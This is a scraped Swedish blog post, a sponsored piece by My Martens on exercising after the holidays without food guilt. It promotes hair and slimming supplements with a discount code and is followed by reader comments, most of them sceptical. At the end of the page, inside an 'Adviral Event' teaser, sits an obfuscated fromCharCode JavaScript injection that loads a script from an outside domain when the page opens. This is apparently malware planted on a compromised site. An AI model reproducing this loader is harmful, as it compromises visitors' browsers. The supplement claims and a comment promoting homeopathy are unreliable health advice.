Mys Blommor / Din florist / Interflora 🌹 / Högsta Kvalitet & Design💫 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

Mys Blommor🌹/ Din florist / Högsta Kvalitet & Design💫 / 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

@mymartens

@mys_blommor

Strong Mamas

Bobbys superhair & beautyslim ger mer ork, mindre sötsug och friskare tjockare hår!

i Samarbete med Bobby Oduncu

EC2BF602-528C-46DB-AEBE-2AB7F126F6C9

Hej!

-Svårt att komma igång med träning och vardag efter julledighet och julmat?😅

Många är fortfarande lediga…. (vi är det, sååå skönt 🙏🏻) Vissa har börjat jobba.

Men ofta efter julhelg och egentligen hela december som är som ett långt uppdukat julbord med lucia-fika, julmat, jul-godis och gud vet vad 😂

Så är det många som får ”mat ångest” och mår dåligt över allt som man har ätit. Släpp det dåliga samvetet…. Skippa ångesten! Det är som det är, fokusera inte på det som har varit, utan fokusera på det som du kan påverka. NU och framåt!

Det är SÅ lätt att man får en dålig relation till kost och mat när man får ångest och ska ”bestraffa” sig själv med träning! Träningen ska inte vara en bestraffning, träningen ska vara kul och ge dig energi! Straffa dig inte med någon hitte-på-diet. Ät vanlig mat, varierad kost och LAGOM mycket.

I kombination med motion och träning så har du en sund helhetshälsa! Var inte ångestfylld över alla goda pepparkakor, julmaten och allt hemmabakat julgodis som du kanske ätit 😄

Njut, och gå vidare. Jag har inte tagit mig till gymmet. Jonas ligger hemma och är sjuk. Lilleman är hemma. Jag har smitit ut, tagit en PW längsmed vattnet och kört mitt nästan uttjatade parkbänkspass.

INTE för att ”straffa mig” för allt jag ätit, utan för att det är sååå skönt när man gjort det!

Dessutom så är parkbänken min bästa träningskompis när jag inte orkar med allt folk på gymmet osv… 😊Många tar tag i träningen i samband med årskiftet. ( Har själv varit en av dom)  Men vänta inte, börja NU!

Ta en PW, kör några bas-övningar utan att komplicerat det för mycket. Tycker du om att köra en klass, gå på spinning eller liknande. Gör det! Men vänta inte på bättre tider! 😄

Jag är en riktig godis-råtta! Jag har absolut ätit mer än vanligt hemma hos svärmor (drömmen med allt hembakad och hennes goda mat😍👇🏻)

3A146342-CF14-418D-8153-D17279E861BF 4BFD8336-E5F6-4224-8BB1-F17C59B876B1 FABFF4BB-A811-42DF-9249-0DD49DC879F5 C17B2E1C-6979-4DC6-AD7F-E9E44A163E0E

Men för första gången på mångas år så mår jag inte dåligt av det. Jag har ätit, njutit och släppt det……

Jag har ÄNTLIGEN hittat mitt sätt att skippa ångesten!  

Jag tycker inte om att prata vikt. Men som ni vet har jag gått ner en del av allt som jag under drygt ett år gått upp. Jag har fortfarande några trivselkilon kvar att få bort…. Men stressar inte över det. Jag vill känna att jag får tillbaka min kraft och ork i träningen 😄 

7C187555-EB61-4F15-9D7D-6EB00FC40AC0

Den vänstra bilden var på julafton hemma hos svärmor för ett år sedan. Den högra bilden i juni/juli.

Detta är julafton i år. Ca 10-12 kilo lättare, MEN framförallt starkare, piggare och MYCKET mer balanserad! 😄👊🏻

527E9AAB-16B1-40DC-9AB2-8D71C91916E9 2A73B9CC-29E8-4958-A550-FAC7688DA470

Mitt vinnande koncept är att inte krångla till det för mycket. Skippa ångesten! (Viktigt)

hitta en motion/träningsform som är rolig! Jag har inte kommit igång med gymmet utan använder mig av naturen och egen kroppsvikt! Jag försöker äta sunt, inga förbud, ingen diet. En varierad kost med lagom mycket av allt.

Självklart minimerat jag socker, och tänker på vad jag äger. Men utan förbud. Vill jag äta en cookie så äter jag en cookie tex. Äter vi en god middag så kanske jag väljer förrätt eller efterrätt osv.

Men jag hetsäter inte längre. Jag har tagit kontroll över mina känslor till maten….  

Dom tillskott jag äter just nu är d-vitamin, min grönskboost, Bobbys Superhair, och Beauty slim

C92A6200

Bobbys Beautyslim PERFEKT om du som jag har problem med sötsuget emellanåt, då kommer du att älska den! 😍🙌🏻

Jag upplever att mitt sötsug blev bättre redan efter ca en dryg vecka, efter några veckor till så var det nästan helt borta!

Den har verkligen hjälpt mig, och gett mig en skjuts i min viktnedgång där målet är att komma tillbaka min vanliga form…. Utan stress eller dieter. Bara sund kost, träning och motion i kombination med Bobbys Beautyslim, har gett mig jätte bra resultat!

Grejen är att det finns INTE ett enda piller i världen som ger dig resultat genom att bara äta det. Du behöver också göra jobbet! Men för mig som rättats med ett sötsug, så har den hjälpt mig. Men framförallt så ger den mig mer energi! Jag som varit trött och orkeslös behöver verkligen Beauty Slim för att få den energi som jag behöver vilket gör att jag ORKAR röra på mig mer! 😃

-Testa du också, du kommer inte ångra dig!

Super hair har fått ordning på mitt egna hår! Det växer som aldrig förr! 🙏🏻🙌🏻  Före/efter

ABFD992D-B0C1-48E9-86EB-773BE584A09C

Mitt egna hår som väderbitna är starkare, friskare, och mycket tjockare än innan…. TACK vare Superhair! Så om du vill få uppleva samma sak som jag så kan jag VARMT rekommendera dessa! Mindre sötsug, MER ork, och tjockare, friskare hår! 🌟

Därför har jag fixat en grym kampanj, åt er!

Med koden my20 så får du 20% vid köp av två eller fler 😄 in och läsa mer och beställ HÄR 

KRAM KRAM

/My Martens 

 

 

22 Komentarer

 1. ”Det är som det är, fokusera inte på det som har varit, utan fokusera på det som du kan påverka. NU och framåt!”
  …:Skulle jag vilja tillägga är något man även ska jobba med att applicera på övriga områden i livet. Relationer, val..
  Svårt, ngt jag själv jobbar på, men… inte bara kosten och träningen, utan allt ältande kring hur man blivit bemött.
  Det är aldrig försent till en bättre framtid. ??

 2. Man kan äta precis vad man vill under jul och nyår, en vecka märks knappast någonting på kroppen men ältar man om ångest hela tiden så slutar det säkert där också

 3. ”Det är som det är, fokusera inte på det som har varit, utan fokusera på det som du kan påverka. NU och framåt!”

  …:Skulle jag vilja tillägga är något man även ska jobba med att applicera på övriga områden i livet. Relationer, val..

  Svårt, ngt jag själv jobbar på, men… inte bara kosten och träningen, utan allt ältande kring hur man blivit bemött.

  Det är aldrig försent till en bättre framtid. 💪🏻

 4. Man kan äta precis vad man vill under jul och nyår, en vecka märks knappast någonting på kroppen men ältar man om ångest hela tiden så slutar det säkert där också

 5. Det bästa är väl ändå att träna på som vanligt även under högtider så slipper man allt detta ”börja om” varenda år och så kan man också med gott samvete äta vad man vill också.

 6. Det bästa är väl ändå att träna på som vanligt även under högtider så slipper man allt detta ”börja om” varenda år och så kan man också med gott samvete äta vad man vill också.

 7. Nu har jag testat Bobbys hårkapslar i 6 månader och märker ingen skillnad…på något…Jag fortsätter med mina kinesiska örter som är beprövade i flera tusen år…de kan sina örter och dom utvecklar hela tiden sin kunskap. Finns det fler som inte har märkt någon skillnad?

 8. Nu har jag testat Bobbys hårkapslar i 6 månader och märker ingen skillnad…på något…Jag fortsätter med mina kinesiska örter som är beprövade i flera tusen år…de kan sina örter och dom utvecklar hela tiden sin kunskap. Finns det fler som inte har märkt någon skillnad?

  • Till STE!
   Det beror på vad du vill behandla ? Något som jag äter/dricker varje sedan många år tillbaka är chaga. Jag gör både tinkturer, kokar det som te eller tar kapslar eller blandar det i en smoothie. Chaga har en hög ORAC och fylld av antioxidanter. Jag har haft turen att inte vara sjuk på 1,5 år och jag tror på chaga som en ”grundmedicinering” Den är inte speciellt dyr om man köper chagabitar. Räcker länge. Jag brukar koka det och ha i lite kanel och kardemumma för att få lite smak och för att få kanelen och kardemummans egenskaper. Använder det som tevatten när jag vill dricka te. Finns hur många sätt som helst.
   http://www.chagamushroom.com/chaga_medical_research.htm
   Om du vill läsa om kinesiska örter kan du titta lite på den här länken:
   https://www.kinabutik.se/kinesiska-orter
   Vill man prova homeopatiska preparat kan du titta på
   http://www.biosan.se/produkter/reckeweg
   Det är bara att botanisera runt. För mig är det viktigt att det inte kostar för mycket och på sommaren har vi en hel natur som vi kan nyttja. Jag tror inte på ”mirakelpiller” utan allt har ett sammanhang och det är många faktorer som spelar in i vårt välmående. Jag tror inte på att fokusera på olika saker utan jag tror på holism ?
   Hoppas att du har fått lite information. Man kan läsa hur mycket som helst och det är stora områden.
   SoL ?

  • Till STE!
   Det beror på vad du vill behandla 🙂 Något som jag äter/dricker varje sedan många år tillbaka är chaga. Jag gör både tinkturer, kokar det som te eller tar kapslar eller blandar det i en smoothie. Chaga har en hög ORAC och fylld av antioxidanter. Jag har haft turen att inte vara sjuk på 1,5 år och jag tror på chaga som en ”grundmedicinering” Den är inte speciellt dyr om man köper chagabitar. Räcker länge. Jag brukar koka det och ha i lite kanel och kardemumma för att få lite smak och för att få kanelen och kardemummans egenskaper. Använder det som tevatten när jag vill dricka te. Finns hur många sätt som helst.

   https://www.chagamushroom.com/chaga_medical_research.htm

   Om du vill läsa om kinesiska örter kan du titta lite på den här länken:
   https://www.kinabutik.se/kinesiska-orter

   Vill man prova homeopatiska preparat kan du titta på
   https://www.biosan.se/produkter/reckeweg

   Det är bara att botanisera runt. För mig är det viktigt att det inte kostar för mycket och på sommaren har vi en hel natur som vi kan nyttja. Jag tror inte på ”mirakelpiller” utan allt har ett sammanhang och det är många faktorer som spelar in i vårt välmående. Jag tror inte på att fokusera på olika saker utan jag tror på holism 🙂

   Hoppas att du har fått lite information. Man kan läsa hur mycket som helst och det är stora områden.

   SoL 🙂

 9. Edit: Jag tror att man måste hålla en bra balans och inte överutnyttja något. I Sverige har vi sällan näring/vitaminbrist då vi har en bra matkultur. Oftast får vi i oss det vi ska med vår kost. Är man vegan behöver man ofta ta till lite extra vitaminer/mineraler men vad det gäller ”mirakelpiller” är det bara det kommersiella som talar….tyvärr

 10. Edit: Jag tror att man måste hålla en bra balans och inte överutnyttja något. I Sverige har vi sällan näring/vitaminbrist då vi har en bra matkultur. Oftast får vi i oss det vi ska med vår kost. Är man vegan behöver man ofta ta till lite extra vitaminer/mineraler men vad det gäller ”mirakelpiller” är det bara det kommersiella som talar….tyvärr

 11. Jag förstår verkligen inte varför folk fortfarande går på det här med att det finns mirakelmedel som gör håret dubbelt så tjockt. Hår är inte en levande organism. Punkt.

 12. Jag förstår verkligen inte varför folk fortfarande går på det här med att det finns mirakelmedel som gör håret dubbelt så tjockt. Hår är inte en levande organism. Punkt.

 13. Å så bör man tänka på att man kan inte bara ge näring till en viss punkt på kroppen. Ditt hår på tex benen får i så fall också ett vitamintillskott. Mvh hon som inte tycker om att raka benen.

 14. Jag har väldigt tjock hår och har alltid haft, men ville göra ett experiment med kapslarna för att se om det blev ännu tjockare, men det blev inte det…så precis som jag trodde så är dom en bluff…kommersiell och dyr smörja. Vi har olika hårtyper, thats it…vi har olika kroppsformer, thats it…quickfix och mirakelpiller ger jag inget för. Skulle det finnas genvägar borde det finnas forskning och evidens och de medlen/preparaten skulle blir storsäljare, om det nu skulle stämma…men forskningen har inte nappat på det för man ser att det inte finns någon vinst i det eller evidens.

 15. Å så bör man tänka på att man kan inte bara ge näring till en viss punkt på kroppen. Ditt hår på tex benen får i så fall också ett vitamintillskott. Mvh hon som inte tycker om att raka benen.

 16. Jag har väldigt tjock hår och har alltid haft, men ville göra ett experiment med kapslarna för att se om det blev ännu tjockare, men det blev inte det…så precis som jag trodde så är dom en bluff…kommersiell och dyr smörja. Vi har olika hårtyper, thats it…vi har olika kroppsformer, thats it…quickfix och mirakelpiller ger jag inget för. Skulle det finnas genvägar borde det finnas forskning och evidens och de medlen/preparaten skulle blir storsäljare, om det nu skulle stämma…men forskningen har inte nappat på det för man ser att det inte finns någon vinst i det eller evidens.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/